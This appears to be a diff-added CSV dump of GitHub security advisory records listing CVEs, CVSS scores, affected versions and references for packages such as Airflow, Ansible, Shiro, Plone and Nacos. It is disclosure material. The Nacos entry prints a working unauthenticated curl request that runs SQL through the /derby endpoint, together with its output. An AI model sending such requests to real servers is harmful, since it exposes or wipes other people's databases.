+- Email us privately at indico-team@cern.ch","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'indico'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/indico/indico/security/advisories/GHSA-wgpj-7c2j-vfjm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-30185'}, {'type': 'WEB', 'url': 'https://github.com/indico/indico/releases/tag/v2.3.4'}, {'type': 'WEB', 'url': 'https://www.shorebreaksecurity.com/blog/'}]","{'cwe_ids': ['CWE-640'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-08T16:33:24Z', 'nvd_published_at': '2021-04-07T14:15:00Z'}"
+1.4.0,GHSA-4jj4-m52p-8rx3,2021-04-07T22:31:58Z,2021-04-13T15:24:08Z,,['CVE-2020-28281'],Prototype pollution in set-object-value,Prototype pollution vulnerability in 'set-object-value' versions 0.0.0 through 0.0.5 allows an attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'set-object-value'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28281'}, {'type': 'WEB', 'url': 'https://github.com/react-atomic/react-atomic-organism/blob/e5645a2f9e632ffdebc83d720498831e09754c22/packages/lib/set-object-value/src/index.js#L16'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28281'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T22:31:58Z', 'nvd_published_at': '2020-12-29T18:15:00Z'}"
+1.4.0,GHSA-7mx5-x372-xh87,2021-04-08T20:26:23Z,2021-04-20T16:40:27Z,,['CVE-2020-17526'],Incorrect Session Validation in Apache Airflow,"Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A. This does not affect users who have changed the default value for `[webserver] secret_key` config.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-17526'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r466759f377651f0a690475d5a52564d0e786e82c08d5a5730a4f8352@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/12/21/1'}]","{'cwe_ids': ['CWE-269'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-08T20:26:23Z', 'nvd_published_at': '2020-12-21T17:15:00Z'}"
+1.4.0,GHSA-jff2-qjw8-5476,2021-04-29T17:22:56Z,2021-04-06T17:30:14Z,,['CVE-2021-21388'],Command Injection Vulnerability in systeminformation,"### Impact
+command injection vulnerability
+
+### Patches
+Problem was fixed with a parameter check. Please upgrade to version >= 5.6.4
+
+### Workarounds
+If you cannot upgrade, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'systeminformation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-jff2-qjw8-5476'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21388'}, {'type': 'WEB', 'url': 'https://github.com/sebhildebrandt/systeminformation/commit/01ef56cd5824ed6da1c11b37013a027fdef67524'}, {'type': 'WEB', 'url': 'https://github.com/sebhildebrandt/systeminformation/commit/0be6fcd575c05687d1076d5cd6d75af2ebae5a46'}, {'type': 'WEB', 'url': 'https://github.com/sebhildebrandt/systeminformation/commit/7922366d707de7f20995fc8e30ac3153636bf35f'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/systeminformation'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-02T20:19:25Z', 'nvd_published_at': '2021-04-29T18:15:00Z'}"
+1.4.0,GHSA-x7wf-5mjc-6x76,2021-04-07T19:31:51Z,2021-04-07T21:13:44Z,,['CVE-2020-28735'],SSRF attacks via tracebacks in Plone,Plone before 5.2.3 allows SSRF attacks via the tracebacks feature (only available to the Manager role).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Plone'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.app.event'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.10'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.app.theming'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.6'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.app.dexterity'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.8'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.supermodel'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28735'}, {'type': 'WEB', 'url': 'https://github.com/plone/Products.CMFPlone/issues/3209'}, {'type': 'WEB', 'url': 'https://dist.plone.org/release/5.2.3/RELEASE-NOTES.txt'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T19:31:51Z', 'nvd_published_at': '2020-12-30T19:15:00Z'}"
+1.4.0,GHSA-6rv4-4qv6-88g2,2021-04-12T17:39:01Z,2021-04-12T17:39:19Z,,['CVE-2021-25913'],Prototype Pollution in set-or-get,Prototype pollution vulnerability in ‘set-or-get’ version 1.0.0 through 1.2.10 allows an attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'set-or-get'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.2.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25913'}, {'type': 'WEB', 'url': 'https://github.com/IonicaBizau/set-or-get.js/commit/82ede5cccb2e8d13e4f62599203a4389f6d8e936'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/set-or-get'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25913'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-12T17:38:22Z', 'nvd_published_at': '2021-02-08T22:15:00Z'}"
+1.4.0,GHSA-4gfq-6m28-m5mg,2021-03-19T23:11:49Z,2021-04-13T15:16:11Z,,['CVE-2020-7775'],Improper neutralization of arguments in freediskspace,This affects all versions of package freediskspace. The vulnerability arises out of improper neutralization of arguments in line 71 of freediskspace.js.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'freediskspace'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7775'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-FREEDISKSPACE-1040716'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T23:11:49Z', 'nvd_published_at': '2021-02-02T19:15:00Z'}"
+1.4.0,GHSA-cq8r-fc3q-6hg2,2021-04-06T20:51:59Z,2021-04-13T15:29:40Z,,['CVE-2020-28479'],Denial of Service (DoS) via the unsetByPath function in jsjoints,The package jointjs before 3.3.0 are vulnerable to Denial of Service (DoS) via the unsetByPath function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'jointjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28479'}, {'type': 'WEB', 'url': 'https://github.com/clientIO/joint/commit/ec7ab01b512a3c06a9944a25d50f255bf07c3499'}, {'type': 'WEB', 'url': 'https://github.com/clientIO/joint/releases/tag/v3.3.0'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1062040'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1062039'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JOINTJS-1062038'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T20:51:59Z', 'nvd_published_at': '2021-01-19T15:15:00Z'}"
+1.4.0,GHSA-j32x-j8pj-pg2h,2021-03-22T22:36:42Z,2021-04-13T15:20:34Z,,['CVE-2020-28450'],Prototype Pollution in decal,This affects all versions of package decal. The vulnerability is in the extend function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'decal'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28450'}, {'type': 'WEB', 'url': 'https://github.com/gigafied/decal.js/blob/master/src/utils/extend.js#L23-L56'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DECAL-1051028'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/decal'}]","{'cwe_ids': ['CWE-1321', 'CWE-400', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:36:42Z', 'nvd_published_at': '2021-02-04T15:15:00Z'}"
+1.4.0,GHSA-p62g-jhg6-v3rq,2023-08-31T20:32:30Z,2021-04-07T20:37:06Z,,['CVE-2020-10684'],"Code Injection, Race Condition, and Execution with Unnecessary Privileges in Ansible","A flaw was found in Ansible Engine, all versions 2.7.x, 2.8.x and 2.9.x prior to 2.7.17, 2.8.9 and 2.9.6 respectively, when using ansible_facts as a subkey of itself and promoting it to a variable when inject is enabled, overwriting the ansible_facts after the clean. An attacker could take advantage of this by altering the ansible_facts, such as ansible_hosts, users and any other key data which would lead into privilege escalation or code injection.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.17'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.9'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10684'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/commit/a9d2ceafe429171c0e2ad007058b88bae57c74ce'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10684'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DKPA4KC3OJSUFASUYMG66HKJE7ADNGFW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MRRYUU5ZBLPBXCYG6CFP35D64NP2UB2S/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WQVOQD4VAIXXTVQAJKTN7NUGTJFE2PCB/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202006-11'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4950'}]","{'cwe_ids': ['CWE-250', 'CWE-362', 'CWE-862', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T14:46:48Z', 'nvd_published_at': '2020-03-24T14:15:00Z'}"
+1.4.0,GHSA-crh4-294p-vcfq,2021-10-08T21:22:01Z,2021-04-19T14:53:20Z,,[],Regular expression denial of service (ReDoS) in EmailField component in Vaadin 14 and 15-17,"Unsafe validation RegEx in `EmailField` component in `com.vaadin:vaadin-text-field-flow` versions 2.0.4 through 2.3.2 (Vaadin 14.0.6 through 14.4.3), and 3.0.0 through 4.0.2 (Vaadin 15.0.0 through 17.0.10) allows attackers to cause uncontrolled resource consumption by submitting malicious email addresses.
+
+- https://vaadin.com/security/cve-2021-31405","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-text-field-flow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.4'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-text-field-flow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '4.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/flow-components/security/advisories/GHSA-crh4-294p-vcfq'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/flow-components'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31405'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:12:10Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4hv7-3q38-97m8,2021-04-06T23:35:22Z,2021-04-13T15:24:47Z,,['CVE-2020-28464'],Arbitrary code execution in djv,"This affects the package djv before 2.1.4. By controlling the schema file, an attacker can run arbitrary JavaScript code on the victim machine.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'djv'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28464'}, {'type': 'WEB', 'url': 'https://github.com/korzio/djv/pull/98/files'}, {'type': 'WEB', 'url': 'https://github.com/korzio/djv/blob/master/lib/utils/properties.js%23L55'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DJV-1014545'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T23:35:22Z', 'nvd_published_at': '2021-01-04T12:15:00Z'}"
+1.4.0,GHSA-xmxh-g7wj-8m4m,2021-04-13T15:32:15Z,2021-04-13T15:32:26Z,,['CVE-2019-10789'],OS Command Injection in curling,npm package `curling` before version 1.1.0 is vulnerable to Command Injection via the run function. The command argument can be controlled by users without any sanitization.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'curling'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10789'}, {'type': 'WEB', 'url': 'https://github.com/hgarcia/curling/blob/e861d625c074679a2931bcf4ce8da0afa8162c53/lib/curl-transport.js#L56'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CURLING-546484'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T23:13:03Z', 'nvd_published_at': '2020-02-06T16:15:00Z'}"
+1.4.0,GHSA-7cj4-gj8m-m2f7,2021-08-31T21:06:39Z,2021-04-22T16:13:23Z,,['CVE-2020-17510'],Authentication bypass in Apache Shiro,"Apache Shiro before 1.7.0, when using Apache Shiro with Spring, a specially crafted HTTP request may cause an authentication bypass.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.shiro:shiro-spring'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-17510'}, {'type': 'WEB', 'url': 'https://github.com/apache/shiro/commit/dc194fc977ab6cfbf3c1ecb085e2bac5db14af6d'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/shiro'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r575301804bfac87a064359cf4b4ae9d514f2d10db7d44120765f4129@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r70098e336d02047ce4d4e69293fe8d558cd68cde06f6430398959bc4@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r70b907ccb306e9391145e2b10f56cc6914a245f91720a17a486c020a@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r852971e28f54cafa7d325bd7033115c67d613b112a2a1076817390ac@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r95bdf3703858b5f958b5e190d747421771b430d97095880db91980d6@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9d93dfb5df016b1a71a808486bc8f9fbafebbdbc8533625f91253f1d@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb47d88af224e396ee34ffb88ee99fb6d04510de5722cf14b7137e6bc@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc2cff2538b683d480426393eecf1ce8dd80e052fbef49303b4f47171%40%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re25b8317b00a50272a7252c4552cf1a81a97984cc2111ef7728e48e0@%3Cdev.shiro.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/08/msg00002.html'}]","{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T21:21:47Z', 'nvd_published_at': '2020-11-05T21:15:00Z'}"
+1.4.0,GHSA-934w-hvj4-7fr6,2021-08-02T15:38:02Z,2021-04-13T15:25:15Z,,['CVE-2020-7762'],Path Traversal in jsreport-chrome-pdf,This affects the package jsreport-chrome-pdf before 1.10.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jsreport-chrome-pdf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7762'}, {'type': 'WEB', 'url': 'https://github.com/jsreport/jsreport-chrome-pdf/commit/6750b2f77d05cb843aefc1c4a98097a3bd33a6a2'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JSREPORTCHROMEPDF-1037310'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T22:36:49Z', 'nvd_published_at': '2020-11-05T13:15:00Z'}"
+1.4.0,GHSA-ghhp-997w-qr28,2021-04-21T19:37:39Z,2021-04-21T19:38:01Z,,['CVE-2021-26701'],.NET Core Remote Code Execution Vulnerability,".NET Core Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-24112.
+
+### Executive summary
+
+Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 5.0, .NET Core 3.1, and .NET Core 2.1. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.
+
+A remote code execution vulnerability exists in .NET 5 and .NET Core due to how text encoding is performed.
+
+### Discussion
+
+Discussion for this issue can be found at dotnet/runtime#49377
+
+### Mitigation factors
+
+Microsoft has not identified any mitigating factors for this vulnerability.
+
+### Affected software
+
+The vulnerable package is `System.Text.Encodings.Web` . Upgrading your package and redeploying your app should be sufficient to address this vulnerability.
+
+Vulnerable package versions:
+
+Any .NET 5, .NET Core, or .NET Framework based application that uses the System.Text.Encodings.Web package with a vulnerable version listed below.
+
+Package Name | Vulnerable Versions | Secure Versions
+-|-|-
+System.Text.Encodings.Web | 4.0.0 - 4.5.0 | 4.5.1
+System.Text.Encodings.Web | 4.6.0-4.7.1 | 4.7.2
+System.Text.Encodings.Web | 5.0.0 | 5.0.1
+
+
+Please validate that each of the .NET versions you are using is in support. Security updates are only provided for supported .NET versions.
+
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'System.Text.Encodings.Web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.5.1'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'System.Text.Encodings.Web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.6.0'}, {'fixed': '4.7.2'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'System.Text.Encodings.Web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.1'}]}], 'versions': ['5.0.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26701'}, {'type': 'WEB', 'url': 'https://github.com/dotnet/announcements/issues/178'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S2AZOUKMCHT2WBHR7MYDTYXWOBHZW5P5/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TW3ZSJTTMZAFKGW7NJWTVVFZUYYU2SJZ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UBOSSX7U6BSHV5RI74FCOW4ITJ5RRJR5/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WA5WQJVHUL5C4XMJTLY3C67R4WP35EF4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XPUKFHIGP5YNJRRFWKDJ2XRS4WTFJNNK/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YLFATXASXW4OV2ZBSRP4G55HJH73QPBP/'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26701'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T19:37:39Z', 'nvd_published_at': '2021-02-25T23:15:00Z'}"
+1.4.0,GHSA-xv5h-v7jh-p2qh,2021-05-10T15:11:26Z,2021-04-27T20:09:25Z,,['CVE-2021-29442'],Authentication bypass for specific endpoint,"The [`ConfigOpsController`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java) lets the user perform management operations like querying the database or even wiping it out. While the [`/data/remove`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java#L133-L135) endpoint is properly protected with the `@Secured` annotation, the [`/derby`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java#L99-L100) endpoint is not protected and can be openly accessed by unauthenticated users.
+
+For example, the following request will list the tables of the database:
+```
+❯ curl -X GET 'http://console.nacos.io/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st'
+{""code"":200,""message"":null,""data"":[{""TABLENAME"":""APP_CONFIGDATA_RELATION_PUBS""},{""TABLENAME"":""APP_CONFIGDATA_RELATION_SUBS""},{""TABLENAME"":""APP_LIST""},{""TABLENAME"":""CONFIG_INFO""},{""TABLENAME"":""CONFIG_INFO_AGGR""},{""TABLENAME"":""CONFIG_INFO_BETA""},{""TABLENAME"":""CONFIG_INFO_TAG""},{""TABLENAME"":""CONFIG_TAGS_RELATION""},{""TABLENAME"":""GROUP_CAPACITY""},{""TABLENAME"":""HIS_CONFIG_INFO""},{""TABLENAME"":""PERMISSIONS""},{""TABLENAME"":""ROLES""},{""TABLENAME"":""SYSALIASES""},{""TABLENAME"":""SYSCHECKS""},{""TABLENAME"":""SYSCOLPERMS""},{""TABLENAME"":""SYSCOLUMNS""},{""TABLENAME"":""SYSCONGLOMERATES""},{""TABLENAME"":""SYSCONSTRAINTS""},{""TABLENAME"":""SYSDEPENDS""},{""TABLENAME"":""SYSDUMMY1""},{""TABLENAME"":""SYSFILES""},{""TABLENAME"":""SYSFOREIGNKEYS""},{""TABLENAME"":""SYSKEYS""},{""TABLENAME"":""SYSPERMS""},{""TABLENAME"":""SYSROLES""},{""TABLENAME"":""SYSROUTINEPERMS""},{""TABLENAME"":""SYSSCHEMAS""},{""TABLENAME"":""SYSSEQUENCES""},{""TABLENAME"":""SYSSTATEMENTS""},{""TABLENAME"":""SYSSTATISTICS""},{""TABLENAME"":""SYSTABLEPERMS""},{""TABLENAME"":""SYSTABLES""},{""TABLENAME"":""SYSTRIGGERS""},{""TABLENAME"":""SYSUSERS""},{""TABLENAME"":""SYSVIEWS""},{""TABLENAME"":""TENANT_CAPACITY""},{""TABLENAME"":""TENANT_INFO""},{""TABLENAME"":""USERS""}]}%
+```
+
